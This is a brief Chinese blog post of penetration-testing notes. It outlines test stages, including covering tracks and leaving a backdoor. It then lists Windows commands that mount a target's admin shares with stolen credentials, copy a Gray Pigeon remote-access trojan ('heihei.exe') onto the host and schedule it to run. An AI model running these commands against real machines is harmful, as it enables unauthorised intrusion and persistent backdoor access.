【愚公系列】2021年12月 网络工程-渗透测试

举报
愚公搬代码 发表于 2021/12/24 14:47:25 2021/12/24
【摘要】 前言渗透测试,是为了证明网络防御按照预期计划正常运行而提供的一种机制。不妨假设,你的公司定期更新安全策略和程序,时时给系统打补丁,并采用了漏洞扫描器等工具,以确保所有补丁都已打上。如果你早已做到了这些,为什么还要请外方进行审查或渗透测试呢?因为,渗透测试能够独立地检查你的网络策略,换句话说,就是给你的系统安了一双眼睛。而且,进行这类测试的,都是寻找网络系统安全漏洞的专业人士。提示:以下是本...

前言

渗透测试,是为了证明网络防御按照预期计划正常运行而提供的一种机制。不妨假设,你的公司定期更新安全策略和程序,时时给系统打补丁,并采用了漏洞扫描器等工具,以确保所有补丁都已打上。如果你早已做到了这些,为什么还要请外方进行审查或渗透测试呢?因为,渗透测试能够独立地检查你的网络策略,换句话说,就是给你的系统安了一双眼睛。而且,进行这类测试的,都是寻找网络系统安全漏洞的专业人士。


提示:以下是本篇文章正文内容,下面案例可供参考

一:测试步骤

1.授权

2.信息收集

  nslookup whois

3.扫描

namp=ip范围 端口 80(IIS,apache,什么网站)scanport
高级扫描:如IIS漏洞2003-IIS6.0 2008IIS7.0
扫描网站漏洞()

4.利用

5.提权(shell环境、桌面环境、最高权限)

6.灭迹

7.留后门

8.渗透测试报告

二、具体流程

1.scanport扫描445端口

2.利用IPC$: 进行破解:NTscan

3.相关命令行

=====================================
net use f: \\10.1.1.2\share 密码 /user:用户
net use f: /del
net use * /del
net use f: \\10.1.1.2\c$ 密码 /user:用户
net use  \\10.1.1.2\ipc$ 密码 /user:用户
==========================================

4.制作

利用光盘上的灰鸽子软件

5.植入(留后门)

copy d:\heihei.exe \\10.1.1.2\c$

6.设置计划任务自动执行:

net time \\10.1.1.2
at \\10.1.1.2 11:11 "c:\heihei.exe"

7.等待客户机上线

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。